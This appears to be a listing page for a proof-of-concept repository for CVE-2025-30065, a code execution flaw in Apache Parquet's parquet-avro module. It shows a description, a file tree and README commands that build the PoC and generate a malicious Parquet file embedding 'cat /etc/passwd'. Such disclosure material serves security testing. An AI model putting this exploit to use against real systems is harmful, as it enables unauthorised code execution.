CVE-2025-30065 PoC: Apache Parquet Code Issue Vulnerability

Associated Vulnerability
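Title: Apache Parquet Code Issue Vulnerability (CVE-2025-30065)
Description: Apache Parquet is a columnar storage format from the Apache Foundation (USA). It can be used by any project in the Hadoop ecosystem. Apache Parquet 1.15.0 and earlier versions contain a code issue vulnerability, which stems from schema parsing in the parquet-avro module and may lead to arbitrary code execution.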
Description
CVE-2025-30065 PoC
Readme
# CVE-2025-30065 PoC

# Usage

## Build the image
```sh
docker build -t cve-2025-30065 .
```

## Generate the malicious Parquet
```sh
docker run --rm -v $(pwd):/poc/out cve-2025-30065 generate "cat /etc/passwd" ./out/malicious.parquet
```

## Trigger the exploit
```sh
docker run --rm -v $(pwd):/poc/out cve-2025-30065 trigger ./out/malicious.parquet
```
File Snapshot

```
[4.0K] /data/pocs/98200fadeaf89230ed0b77f89ed19f0b88470ffe
├── [ 406] Dockerfile
├── [4.0K] poc
│   ├── [ 350] entrypoint.sh
│   ├── [2.2K] pom.xml
│   └── [4.0K] src
│       └── [4.0K] main
│           └── [4.0K] java
│               ├── [2.2K] GeneratePayload.java
│               ├── [1.6K] MaliciousObject.java
│               └── [1.7K] TriggerVuln.java
└── [ 354] README.md

4 directories, 7 files
```